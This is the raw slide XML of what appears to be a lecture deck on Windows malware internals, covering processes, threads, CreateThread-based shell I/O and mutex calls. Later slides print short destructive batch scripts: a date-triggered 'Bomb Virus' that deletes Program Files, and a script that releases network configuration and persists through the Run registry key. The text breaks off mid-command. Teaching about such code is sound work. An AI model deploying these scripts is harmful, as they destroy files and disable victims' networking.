            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Malware: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>wn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>independent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>(Traditionally)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Executes as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>part of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>another process (Newer malware).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>To create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>a new process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CreateProcess</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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5357378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68760"/>
            <a:ext cx="5760640" cy="5265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7450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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Thread</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Processes are the container for execution, but threads are what the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Windows OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>executes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>To create a new thread </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CreateThread</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="614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072" y="3429000"/>
            <a:ext cx="5606600" cy="323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9333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lstStyle/>
          <a:p>
            <a:pPr lvl="2"/>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24744"/>
            <a:ext cx="6274914" cy="5320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59843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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Malware can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CreateThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> in multiple ways:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>a new malicious library into a process</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>two new threads for input and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>One </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>listen on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>a socket or pipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>output that to standard input of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>One to read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>from standard output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>send </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>that to a socket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>or pipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="273374008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a:xfrm>
            <a:off x="251520" y="1196752"/>
            <a:ext cx="8784976" cy="5112568"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> (Mutant)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Mutexes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> are global objects that coordinate multiple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>processes and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>threads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>E.g. A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> can control access of 2 threads to the memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>one thread can own a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> at a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> calls:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WaitForSingleObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>thread gains access to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ReleaseMutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>thread is finished using a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>mutex</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CreateMutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>is created</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OpenMutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Allow one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>can get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>a handle to another process’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>mutex</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="928718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7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="2809350"/>
            <a:ext cx="4381500" cy="1631950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF7C8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6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r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&gt; Bomb Virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>If %date% NEQ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2019/04/30 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> exit</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>del C:\Program Files\.... /y &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:exit</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6148" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6149" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12700" y="0"/>
            <a:ext cx="9110324" cy="2769989"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&gt;Disable Internet Permanently (bat file)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>echo @echo off&gt;c:windowswimn32.bat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echo break off&gt;&gt;c:windowswimn32.bat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echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ipconfig/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>release_all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>c:windowswimn32.bat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echo end&gt;&gt;c:windowswimn32.bat</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hkey_local_machinesoftwaremicrosoftwindowscurrentv</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ersionrun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WINDOWsAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reg_sz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /d c:windowswimn32.bat /f</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
